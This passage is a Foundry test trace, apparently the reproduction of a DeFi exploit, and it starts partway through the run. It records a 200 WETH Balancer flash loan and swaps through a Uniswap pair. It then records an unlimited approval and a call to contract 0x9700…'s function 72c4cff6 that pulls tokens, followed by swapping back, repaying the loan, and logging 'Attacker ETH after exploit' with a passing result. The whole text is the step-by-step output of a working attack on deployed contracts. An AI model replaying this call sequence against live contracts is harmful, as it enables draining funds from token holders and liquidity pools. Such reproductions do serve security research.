    │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x00000000000000000000000000000000000000000000000ad62b76e268960000
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0xC2C701110dE2b9503E98619d9c9e3017877b0f72, 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, to: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, value: 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x7bef77c31785d26b528aabfd5085ccf57f954814dd85cc8f2e0ddaf5453e36c1: 0x0000000000000000000000000000000000000000000000031c4e6a298dc619bf → 0x00000000000000000000000000000000000000000000000df279e10bf65c19bf
    │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x00000000000000000000000000000000000000000000000ad62b76e268960000 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [49790] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::swap(3569135318995629065048252063 [3.569e27], 0, Money: [0xc7183455a4C133Ae270771860664b6B7ec320bB1], 0x)
    │   │   │   │   │   ├─ [36197] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transfer(Money: [0xc7183455a4C133Ae270771860664b6B7ec320bB1], 3569135318995629065048252063 [3.569e27])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, to: Money: [0xc7183455a4C133Ae270771860664b6B7ec320bB1], value: 3569135318995629065048252063 [3.569e27])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xbda5c3b0e636d87e9689db6e66a16c5dea6d4bc5a1a7a9f0e242006b64cce914: 0x00000000000000000000000000000000000000000eda4fff0388eeb121ace578 → 0x00000000000000000000000000000000000000000351fe31ad232bf12dd386d9
    │   │   │   │   │   │   │   @ 14: 16354 → 16355
    │   │   │   │   │   │   │   @ 0x8bcaf0e9a0423cfcb00b3386345b89362c3f715f8c9d1398cb4686281233d063: 0 → 0x00000000000000000000000000000000000000000b8851cd5665c2bff3d95e9f
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1027578418305792378580207321 [1.027e27]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 257279916629078841791 [2.572e20]
    │   │   │   │   │   ├─ emit Sync(reserve0: 1027578418305792378580207321 [1.027e27], reserve1: 257279916629078841791 [2.572e20])
    │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 199900000000000000000 [1.999e20], amount0Out: 3569135318995629065048252063 [3.569e27], amount1Out: 0, to: Money: [0xc7183455a4C133Ae270771860664b6B7ec320bB1])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x65d8bca30000000000031c4e6a298dc619bf00000eda4fff0388eeb121ace578 → 0x65d8bca300000000000df279e10bf65c19bf00000351fe31ad232bf12dd386d9
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] [199900000000000000000 [1.999e20], 3569135318995629065048252063 [3.569e27]]
    │   │   │   ├─ [25266] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::approve(0x9700204D77A67A18eA8F1B47275897b21e5eFA97, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: Money: [0xc7183455a4C133Ae270771860664b6B7ec320bB1], spender: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x9f2829c1476b5b5a06384b5c6b20489563335b3ddf903f61ca7628ba5733aca5: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [25342] 0x9700204D77A67A18eA8F1B47275897b21e5eFA97::72c4cff6{value: 20000000000000000}(0000000000000000000000000d505c03d30e65f6e9b4ef88855a47a89e4b76760000000000000000000000000000000000000000001908f29f1e5e61dde00000)
    │   │   │   │   ├─ [12130] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transferFrom(Money: [0xc7183455a4C133Ae270771860664b6B7ec320bB1], 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, 30265400000000000000000000 [3.026e25])
    │   │   │   │   │   ├─ emit Transfer(from: Money: [0xc7183455a4C133Ae270771860664b6B7ec320bB1], to: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 30265400000000000000000000 [3.026e25])
    │   │   │   │   │   ├─ emit Approval(owner: Money: [0xc7183455a4C133Ae270771860664b6B7ec320bB1], spender: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 115792089237316195423570985008687907853269984665640533774057584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x9f2829c1476b5b5a06384b5c6b20489563335b3ddf903f61ca7628ba5733aca5: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffe6f70d60e1a19e221fffff
    │   │   │   │   │   │   @ 0xf2f990490f98f333693ac7d75623d20de79f35ab79b3d154d003025f90e2b764: 0x0000000000000000000000000000000000000000011a773e3f451b8f77800000 → 0x000000000000000000000000000000000000000001338030de6379f155600000
    │   │   │   │   │   │   @ 0x8bcaf0e9a0423cfcb00b3386345b89362c3f715f8c9d1398cb4686281233d063: 0x00000000000000000000000000000000000000000b8851cd5665c2bff3d95e9f → 0x00000000000000000000000000000000000000000b6f48dab747645e15f95e9f
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [564] 0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f::getPair(0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72
    │   │   │   │   ├─ [504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 1027578418305792378580207321 [1.027e27], 257279916629078841791 [2.572e20], 1708702883 [1.708e9]
    │   │   │   │   ├─ [381] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::token0() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0: 1 → 2
    │   │   │   │   │   @ 0x9f2829c1476b5b5a06384b5c6b20489563335b3ddf903f61ca7628ba5733aca5: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffe6f70d60e1a19e221fffff
    │   │   │   │   └─ ← [Revert] revert: Insufficient ETH balance
    │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(Money: [0xc7183455a4C133Ae270771860664b6B7ec320bB1]) [staticcall]
    │   │   │   │   └─ ← [Return] 3569135318995629065048252063 [3.569e27]
    │   │   │   ├─ [28771] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3569135318995629065048252063 [3.569e27])
    │   │   │   │   ├─ emit Transfer(from: Money: [0xc7183455a4C133Ae270771860664b6B7ec320bB1], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3569135318995629065048252063 [3.569e27])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000b8851cd5665c2bff3d95e9f
    │   │   │   │   │   @ 0x8bcaf0e9a0423cfcb00b3386345b89362c3f715f8c9d1398cb4686281233d063: 0x00000000000000000000000000000000000000000b8851cd5665c2bff3d95e9f → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [41] ContractTest::fallback{value: 100000000000000000}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 32: 0 → 0x0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
    │   │   │   │   @ 37: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 33: 0 → 0x0000000000000000000000000d505c03d30e65f6e9b4ef88855a47a89e4b7676
    │   │   │   │   @ 34: 0 → 0x0000000000000000000000009700204d77a67a18ea8f1b47275897b21e5efa97
    │   │   │   │   @ 35: 0 → 0x00000000000000000000000055d398326f99059ff775485246999027b3197955
    │   │   │   │   @ 0xc81bef5f06b6cad6ab4e99e6402b57acf7dfbb75ae7de3271bfc8b0196f44d63: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   @ 31: 0 → 0x00000000000000000000007109709ecfa91a80626ff3989d68f67f5b1dd12d01
    │   │   │   │   @ 36: 0 → 0x000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2
    │   │   │   │   @ 0x9f2829c1476b5b5a06384b5c6b20489563335b3ddf903f61ca7628ba5733aca5: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] 8811 bytes of code
    │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 3569135318995629065048252063 [3.569e27]
    │   │   ├─ [3266] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0xfffffffffffffffffffffffffffffffffffffffff475d606dafb52f17579ced0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [38847] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokens(3569135318995629065048252063 [3.569e27], 0, [0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1708703003 [1.708e9])
    │   │   │   ├─ [504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 1027578418305792378580207321 [1.027e27], 257279916629078841791 [2.572e20], 1708702883 [1.708e9]
    │   │   │   ├─ [13739] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, 3569135318995629065048252063 [3.569e27])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, value: 3569135318995629065048252063 [3.569e27])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665636994904138588378848081387872 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000b8851cd5665c2bff3d95e9f → 0
    │   │   │   │   │   @ 0xbda5c3b0e636d87e9689db6e66a16c5dea6d4bc5a1a7a9f0e242006b64cce914: 0x00000000000000000000000000000000000000000351fe31ad232bf12dd386d9 → 0x00000000000000000000000000000000000000000eda4fff0388eeb121ace578
    │   │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffff477ae32a99a3d400c26a160
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [16855] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::swap(0, 199631655660793032087 [1.996e20], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199631655660793032087 [1.996e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199631655660793032087 [1.996e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000360d61cd68b3e333bb → 0x000000000000000000000000000000000000000000000040dfd3ea89e48e2152
    │   │   │   │   │   │   @ 0x7bef77c31785d26b528aabfd5085ccf57f954814dd85cc8f2e0ddaf5453e36c1: 0x00000000000000000000000000000000000000000000000df279e10bf65c19bf → 0x0000000000000000000000000000000000000000000000032007c3eac5b12c28
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4596713737301421443628459384 [4.596e27]
    │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   └─ ← [Return] 57648260968285809704 [5.764e19]
    │   │   │   │   ├─ emit Sync(reserve0: 4596713737301421443628459384 [4.596e27], reserve1: 57648260968285809704 [5.764e19])
    │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 3569135318995629065048252063 [3.569e27], amount1In: 0, amount0Out: 0, amount1Out: 199631655660793032087 [1.996e20], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x65d8bca300000000000df279e10bf65c19bf00000351fe31ad232bf12dd386d9 → 0x65d8bca30000000000032007c3eac5b12c2800000eda4fff0388eeb121ace578
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return] [3569135318995629065048252063 [3.569e27], 199631655660793032087 [1.996e20]]
    │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0xBA12222222228d8Ba445958a75a0704d566BF2C8, 200000000000000000000 [2e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xBA12222222228d8Ba445958a75a0704d566BF2C8, value: 200000000000000000000 [2e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x000000000000000000000000000000000000000000000be5988dea333bc1b26a → 0x000000000000000000000000000000000000000000000bf0701ca68e01e1b26a
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000040dfd3ea89e48e2152 → 0x00000000000000000000000000000000000000000000003608452e2f1e6e2152
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   @ 12: 0 → 1
    │   │   │   @ 38: 0 → 0x000000000000000000000000c7183455a4c133ae270771860664b6b7ec320bb1
    │   │   └─ ← [Stop]
    │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xBA12222222228d8Ba445958a75a0704d566BF2C8) [staticcall]
    │   │   └─ ← [Return] 56381328404216832701034 [5.638e22]
    │   ├─ emit FlashLoan(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, param2: 200000000000000000000 [2e20], param3: 0)
    │   └─ ← [Stop]
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker ETH after exploit", val: 79228161529072816349105401162 [7.922e28], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 25.17s (23.44s CPU time)

Ran 2 test suites in 26.16s (26.07s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
